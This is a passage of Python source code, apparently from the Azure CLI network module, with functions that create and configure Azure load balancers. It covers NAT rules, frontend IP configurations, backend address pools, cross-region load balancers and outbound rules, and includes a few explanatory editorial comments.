def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
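# NOTE (editorial): create_load_balancer (and its cross-region variant below) does not call the
# network SDK directly; it assembles an ARM template via ArmTemplateBuilder so that a new public IP
# and/or vnet can be created in the same deployment as the load balancer, then hands the template
# to the resource deployments client (only validating it when the validate flag is set).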
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port,
backend_port, frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
InboundNatRule = cmd.get_models('InboundNatRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
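# NOTE (editorial): lb_get/lb_get_operation strip the zones returned on zone-redundant frontend IP
# configurations that are backed by a public IP (no subnet) before the load balancer object is PUT
# back, since echoing those zones in the update can otherwise be rejected by the service; see the
# issue linked above for the background.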
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
            raise UnrecognizedArgumentError('a vnet must be provided when the subnet is specified by name rather than by resource ID')
subnet = vnet + f'/subnets/{subnet}'
return subnet
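# NOTE (editorial): the two helpers above expand bare names into full ARM resource IDs, e.g. a vnet
# name 'MyVnet' in resource group 'MyRG' becomes (subscription ID is a placeholder):
#     /subscriptions/<sub-id>/resourceGroups/MyRG/providers/Microsoft.Network/virtualNetworks/MyVnet
# and a subnet given by name is appended as '<vnet-id>/subnets/<subnet-name>'.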
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
        if not isinstance(backend_addresses_config_file, list):
            raise CLIError('Config file must be a list. Please see the example for reference.')
        for addr in backend_addresses_config_file:
            if not isinstance(addr, dict):
                raise CLIError('Each address in the config file must be a dictionary. Please see the example for reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
# Before 2020-03-01, service doesn't support the other rest method.
# We have to use old one to keep backward compatibility.
# Same for basic sku. service refuses that basic sku lb call the other rest method.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
# when sku is 'gateway', 'tunnelInterfaces' can't be None. Otherwise service will response error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
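# NOTE (editorial): the backend-addresses config file consumed above is expected to parse to a list
# of dictionaries. A minimal, assumed example of the shape the code reads ('subnet' may be a name
# when 'virtual_network' is given, or a full resource ID on its own):
#     [
#         {"name": "addr1", "ip_address": "10.0.0.4", "virtual_network": "MyVnet"},
#         {"name": "addr2", "ip_address": "10.0.0.5", "subnet": "<full subnet resource ID>"}
#     ]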
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
        if not isinstance(backend_addresses_config_file, list):
            raise CLIError('Config file must be a list. Please see the example for reference.')
        for addr in backend_addresses_config_file:
            if not isinstance(addr, dict):
                raise CLIError('Each address in the config file must be a dictionary. Please see the example for reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise CLIError('Each backend address must have name and frontend_ip_configuration information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
        # To keep compatibility when bumping the API version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet name | subnet id) information.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
